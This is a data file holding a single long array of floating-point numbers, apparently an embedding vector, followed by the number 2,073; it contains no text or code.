0.016070181503891945, 0.006580792833119631, 0.011173917911946774, -0.0042784749530255795, -0.0075362552888691425, 0.0023138297256082296, -0.0021066211629658937, 0.00907113403081894, -0.002144993282854557, -0.005437308456748724, -0.008303694427013397, -0.0027570261154323816, -0.013414841145277023, -0.0207976084202528, 0.006293002981692553, 0.003207896836102009, 0.006619165185838938, -0.005759632680565119, -0.004447311628609896, -0.0029201069846749306, 0.015532974153757095, 0.0024596434086561203, 0.00304481596685946, 0.004263125825673342, -0.017528316006064415, -0.005349052604287863, 0.006461839657276869, 0.016822272911667824, -0.0013056063326075673, 0.0058824229054152966, 0.016499947756528854, 0.00024486114853061736, -0.013760188594460487, 0.0224706269800663, 0.02144225686788559, -0.04623055085539818, 0.020490633323788643, -0.01267042476683855, 0.0007803899352438748, 0.014688790775835514, 0.02047528326511383, 0.0029220255091786385, 0.007171721197664738, -0.0021660977508872747, -0.01749761961400509, -0.014289721846580505, 0.009086482226848602, 0.01610087975859642, -0.015694135800004005, 0.014082513749599457, 0.02219434827566147, 0.007820207625627518, -0.005138006992638111, 0.010813221335411072, 0.00008561745926272124, -0.011189267039299011, -0.01603948324918747, 0.002555573359131813, -0.0009967118967324495, 0.008833227679133415, -0.011588335037231445, -0.00655009550973773, -0.006116492208093405, 0.021795280277729034, 0.00679183891043067, 0.02375992387533188, -0.006880094297230244, 0.0013180772075429559, -0.012977400794625282, 0.002026040107011795, 0.013936699368059635, 0.010061130858957767, 0.0020164470188319683, -0.0031656876672059298, 0.010928337462246418, -0.01193368248641491, 0.0045125437900424, 0.0148806506767869, -0.0022466788068413734, 0.0003086545330006629, 0.007605324499309063, 0.021902721375226974, 0.01048322208225727, 0.01088229101151228, -0.012892981991171837, 0.0025344686582684517, 0.018111569806933403, -0.014619721099734306, -0.004692892078310251, 0.0048617287538945675, -0.007612999062985182, -0.0048617287538945675, -0.015057161450386047, -0.0012845017481595278, -0.0025709220208227634, -0.038494762033224106, 0.006116492208093405, -0.010352757759392262, -0.01960040256381035, 0.021104583516716957, -0.003704813774675131, -0.006745792459696531, 0.00028611099696718156, 0.021027840673923492, 0.0059169577434659, -0.017083201557397842, 0.023023182526230812, -0.044757068157196045, 0.012509262189269066, -0.005103472154587507, -0.0005348093691281974, 0.00864136777818203, 0.0008499391260556877, 0.018602730706334114, 0.0016912446590140462, 0.012939028441905975, -0.017896687611937523, -0.0017382502555847168, -0.006626839283853769, -0.009899968281388283, -0.0021852836944162846, 0.0057366094551980495, 0.007904626429080963, 0.004259288776665926, 0.0049538216553628445, 0.026599450036883354, 0.01674552820622921, -0.011665078811347485, 0.008395787328481674, 0.006599979009479284, 0.010291362181305885, -0.0012672343291342258, -0.01755901426076889, 0.0033556288108229637, -0.010851593688130379, -0.018986450508236885, -0.018879009410738945, -0.020214354619383812, 0.0253408495336771, -0.021687837317585945, -0.007068117149174213, 0.02349899522960186, -0.013591351918876171, -0.001455256948247552, 0.004190219100564718, -0.0026035383343696594, 0.020030168816447258, -0.0029469672590494156, 0.011058801785111427, 0.015732508152723312, -0.004370567388832569, 0.013422515243291855, -0.03137292340397835, -0.002336852950975299, 0.0072676511481404305, -0.006584630347788334, -0.011887636967003345, 0.0076782312244176865, 0.0026726077776402235, 0.028594791889190674, 0.0056560286320745945, 0.018326453864574432, 0.024066900834441185, -0.004205568227916956, -0.0236064363270998, -0.0030428972095251083, -0.0024231900461018085, -0.006638350896537304, -0.009140203706920147, -0.004048242699354887, -0.014013444073498249, 0.0038813247811049223, 0.007639859337359667, 0.015855297446250916, 0.0037815577816218138, -0.014826929196715355, 0.0005952452193014324, -0.0010811302345246077, 0.005080448929220438, 0.01653064414858818, -0.015870647504925728, -0.0011396475601941347, -0.009063459932804108, 0.011657404713332653, -0.008311368525028229, 0.012716471217572689, 0.01620832085609436, 0.003940801601856947, -0.0020337144378572702, -0.017037155106663704, -0.01182624138891697, 0.0049806819297373295, 0.002482666401192546, -0.02004551701247692, 0.027520377188920975, -0.004573938902467489, 0.024005504325032234, -0.011219964362680912, -0.009332063607871532, -0.00458928756415844, 0.009462527930736542, -0.006208585109561682, 0.004205568227916956, 0.003704813774675131, -0.0017344130901619792, -0.011872287839651108, 0.010122525505721569, -0.005072774365544319, -0.01269344799220562, -0.012539960443973541, -0.017252037301659584, -0.02733619138598442, 0.0016356052365154028, -0.007743463851511478, 0.002559410408139229, -0.0005141844158060849, -0.0013238330138847232, -0.014166931621730328, -0.005744284018874168, 0.01777389645576477, -0.00362615124322474, -0.012271355837583542, -0.005924632307142019, -0.01542553212493658, 0.010575314983725548, -0.012217635288834572, -0.024865036830306053, 0.004938472528010607, 0.007701254449784756, 0.0048348684795200825, 0.02322271652519703, -0.008119508624076843, 0.0006950123351998627, -0.0063850958831608295, 0.014903673902153969, -0.023099927231669426, 0.02646131068468094, 0.0026284800842404366, 0.0018466510809957981, 0.004055917263031006, -0.0002279534819535911, 0.012447867542505264, 0.0031771992798894644, 0.007221604697406292, -0.011902985163033009, 0.008457181975245476, -0.00947787705808878, 0.009815550409257412, -0.004992193542420864, 0.030052928254008293, 0.004282312002032995, -0.0033038267865777016, -0.0030256297904998064, 0.005598470568656921, 0.013453212566673756, 0.016177622601389885, 0.0297613013535738, -0.011442521587014198, 0.011688102036714554, -0.021472955122590065, 0.0016442389460280538, 0.001770866452716291, 0.013269027695059776, 0.016653435304760933, 0.0022869694512337446, -0.005210913717746735, 0.006964512635022402, -0.0011127871694043279, 0.024926431477069855, 0.025402244180440903, 0.0002734003064688295, -0.007513232063502073, -0.00295847887173295, -0.014788557775318623, 0.007018233649432659, 0.013998094946146011, 0.005517889279872179, 0.018403196707367897, 0.01669948175549507, -0.020736213773489, 0.00719858193770051, 0.001154996338300407, 0.010222293436527252, -0.012486238963901997, -0.02382132038474083, 0.018326453864574432, -0.011926008388400078, -0.006573118735104799, -0.0016691806958988309, -0.0032098153606057167, -0.01674552820622921, -0.030451996251940727, 0.008902297355234623, 0.020567376166582108, 0.01955435611307621, 0.002434701658785343, 0.0059476555325090885, 0.01858738251030445, 0.013537631370127201, -0.0014082513516768813, 0.006216259207576513, -0.019109241664409637, 0.016085529699921608, 0.004132661037147045, -0.00045015118666924536, -0.008779507130384445, 0.006051259580999613, -0.0011310138506814837, 0.020889701321721077, -0.01983063481748104, 0.01542553212493658, 0.002847200259566307, -0.00996903795748949, 0.009163226932287216, 0.008365090005099773, 0.00907880812883377, 0.008096485398709774, -0.006968349684029818, 0.003963824361562729, -0.004520218353718519, -0.01890970766544342, 0.01547925267368555, 0.017743200063705444, 0.006661374121904373, -0.0003283201658632606, -0.006484862882643938, 0.026614798232913017, 0.0007549685542471707, 0.003831441281363368, 0.016285063698887825, -0.002043307526037097, 0.015302741900086403, -0.014589022845029831, 0.016177622601389885, 0.005951492581516504, 0.003979173488914967, 0.017466921359300613, 0.0016653435304760933, 0.006872420199215412, 0.00516103021800518, 0.03128083050251007, 0.0013238330138847232, 0.01582460105419159, 0.029254790395498276, -0.013882978819310665, -0.00765904551371932, -0.00044967152643948793, 0.024435270577669144, 0.01402111817151308, -0.025371547788381577, -0.0021660977508872747, -0.00947787705808878, 0.006523235235363245, 0.049361702054739, 0.013952048495411873, -0.011074150912463665, -0.006151027046144009, -0.0006782246055081487, 0.011565311811864376, -0.04417381435632706, 0.020321795716881752, -0.002359876176342368, 0.0018946160562336445, 0.009416481480002403, -0.019370170310139656, 0.01131973136216402, 0.003440047148615122, -0.0014418268110603094, -0.0012557227164506912, 0.03781941533088684, 0.00304481596685946, -0.010713454335927963, 0.02208690717816353, -0.005679051857441664, -0.020030168816447258, -0.0036817905493080616, 0.015156928449869156, 0.0015128148952499032, -0.0033479544799774885, 0.013829258270561695, -0.00590160908177495, -0.019262729212641716, 0.0025498175527900457, -0.001822668593376875, -0.001444704714231193, 0.00026308782980777323, -0.011588335037231445, -0.00458928756415844, -0.0036990579683333635, -0.008633693680167198, 0.005168704316020012, -0.010598338209092617, 0.006987535860389471, -0.015387160703539848, 0.011312057264149189, 0.007858579978346825, -0.018541336059570312, -0.00022183795226737857, 0.009270668029785156, -0.011588335037231445, 0.006197073496878147, -0.03171059489250183, 0.01863342896103859, 0.015110881999135017, 0.018618080765008926, -0.01852598786354065, 0.007858579978346825, -0.002045226050540805, 0.0045969621278345585, -0.0017881338717415929, -0.0020644119940698147, -0.006665211170911789, 0.00993834063410759, 0.020782260224223137, 0.01668413355946541, 0.005287657491862774, 0.018648777157068253, 0.0038870805874466896, 0.0007712765946052969, -0.02328411117196083, -0.00342277972958982, 0.003944638650864363, 0.010621361434459686, -0.0018879009876400232, -0.009408807381987572, 0.012371123768389225, -0.009554620832204819, 0.013307399116456509, 0.027673864737153053, 0.016975760459899902, 0.0022812136448919773, -0.014236001297831535, -0.0017670292872935534, 0.02392876148223877, -0.030482694506645203, 0.005475680343806744, 0.010122525505721569, 0.014366465620696545, -0.007428813725709915, -0.019354822114109993, 0.006296840496361256, -0.003278884803876281, 0.018433894962072372, 0.000931479618884623, -0.008111834526062012, -0.01657669059932232, 0.009309040382504463, 0.022163650020956993, -0.006404282059520483, -0.0054449825547635555, 0.011979728937149048, 0.0024097596760839224, -0.018971102312207222, -0.0031100481282919645, 0.018280407413840294, -0.00634672399610281, 0.007889277301728725, 0.010076479986310005, 0.01760506071150303, 0.005498703569173813, -0.0003352751082275063, 0.020168308168649673, 0.003695220686495304, -0.0010206943843513727, -0.014289721846580505, -0.006692071910947561, -0.008418810553848743, -0.0021181327756494284, -0.0018581626936793327, -0.0003659726644400507, -0.021964116021990776, 0.01169577706605196, -0.0028414444532245398, 0.017482269555330276, 0.01272414531558752, 0.02165714092552662, -0.005279983393847942, -0.009385784156620502, -0.010982058010995388, 0.015763206407427788, 0.006906954571604729, -0.018111569806933403, -0.012939028441905975, -0.00958531815558672, 0.0008628896903246641, -0.005203239154070616, 0.007340557873249054, 0.052646342664957047, 0.016545994207262993, 0.005333703942596912, 0.007037419360131025, -0.00991531740874052, -0.00012566820078063756, -0.013537631370127201, -0.0030045253224670887, 0.009439504705369473, 0.003933127038180828, -0.01781994290649891, -0.014366465620696545, 0.024112947285175323, -0.006692071910947561, -0.007847067900002003, 0.012309728190302849, -0.010444850660860538, -0.007720440626144409, -0.01396739762276411, -0.01034508366137743, -0.004289986565709114, 0.008380438201129436, 0.007474859710782766, 0.012655075639486313, 0.013882978819310665, -0.0032481872476637363, -0.00005018334195483476, 0.01323065534234047, 0.01187996193766594, -0.04899333417415619, 0.024772943928837776, -0.002555573359131813, 0.014420186169445515, 0.000006602676876354963, 0.01863342896103859, 0.026921775192022324, 0.006834047846496105, 0.017420874908566475, -0.0019013311248272657, -0.014466232620179653, 0.015870647504925728, 0.01539483480155468, 0.014259024523198605, -0.00684555945917964, -0.021902721375226974, 0.011457870714366436, -0.0032865593675523996, -0.01358367782086134, 0.002684119390323758, 0.026507357135415077, 0.00227545783855021, 0.0037412671372294426, 0.009316714480519295, -0.008441833779215813, 0.029991531744599342, -0.024435270577669144, 0.005065100267529488, 0.0020049354061484337, -0.0012691529700532556, -0.012992748990654945, -0.016607388854026794, -0.013537631370127201, 0.011964380741119385, -0.0006988495006226003, -0.008058113977313042, 0.006204747594892979, 0.01566343940794468, -0.00035350178950466216, 0.01940086856484413, 0.004286149051040411, 0.00034702650737017393, -0.004416613839566708, 0.014297395944595337, -0.020321795716881752, -0.012102519161999226, 0.006949163973331451, 0.00046837786794640124, 0.0013909839326515794, 0.016070181503891945, -0.0064503285102546215, -0.0034918494056910276, -0.014274372719228268, 0.007647533901035786, 0.0033882451243698597, -0.0077703241258859634, 0.010383455082774162, 0.005111146718263626, -0.005625330843031406, -0.014865301549434662, 0.024235736578702927, -0.0005506377783603966, -0.00025445412029512227, -0.02613898739218712, 0.010467873886227608, -0.003628069767728448, 0.0048617287538945675, 0.007835556752979755, -0.008058113977313042, 0.002359876176342368, -0.013031121343374252, -0.007919974625110626, -0.012079496867954731, -0.03560918942093849, -0.009646713733673096, 0.013107865117490292, -0.03431989252567291, -0.015978088602423668, -0.013031121343374252, -0.010705780237913132, 0.008096485398709774, 0.005149518605321646, -0.007125674746930599, -0.00725230248644948, -0.004274637438356876, 0.006580792833119631, -0.006112655159085989, -0.0033978379797190428, -0.009355086833238602, 0.01679157465696335, -0.0026649334467947483, -0.008572298102080822, 0.014343442395329475, 0.023852016776800156, 0.0026303986087441444, 0.013222981244325638, 0.012294379062950611, 0.011312057264149189, 0.0104295015335083, -0.006953001022338867, 0.014696464873850346, 0.014757859520614147, -0.004631496965885162, 0.029070604592561722, 0.012033450417220592, -0.01593204215168953, 0.015141579322516918, -0.004677543416619301, 0.012355774641036987, 0.0016979597276076674, 0.009600667282938957, -0.04472636803984642, 0.04303800314664841, -0.0014255187707021832, 0.008595321327447891, -0.009293691255152225, -0.031296178698539734, -0.0032481872476637363, -0.02349899522960186, 0.007022070698440075, -0.036161746829748154, 0.01539483480155468, 0.002952723065391183, 0.031019901856780052, -0.004627659451216459, -0.004324520938098431, 0.017651107162237167, -0.012754842638969421, 0.029899438843131065, -0.004907775204628706, 0.014059490524232388, 0.01717529445886612, -0.009792527183890343, 0.01169577706605196, -0.005751958582550287, 0.011074150912463665, -0.0006235445034690201, 0.010245316661894321, 0.0046890550293028355, 0.0023733063135296106, -0.012309728190302849, -0.00429382361471653, 0.01852598786354065, -0.0060397484339773655, -0.025478988885879517, -0.011434847488999367, 0.0009540230967104435, 0.01998412236571312, 0.007210093084722757, -0.00544114550575614, 0.016545994207262993, 0.0006695908959954977, -0.007804858963936567, -0.020337143912911415, 0.013975071720778942, 0.006515560671687126, -0.011081825010478497, -0.02036784216761589, -0.0064771887846291065, 0.02517201192677021, -0.012279030866920948, -0.008249973878264427, 0.018572034314274788, 0.01178019493818283, -0.009239970706403255, -0.01577855460345745, 0.01313088834285736, 0.013468561694025993, 0.024220388382673264, 0.027259448543190956, 0.010667407885193825, -0.002845281735062599, -0.0075055574998259544, -0.010782524012029171, 0.012877633795142174 ]
2,073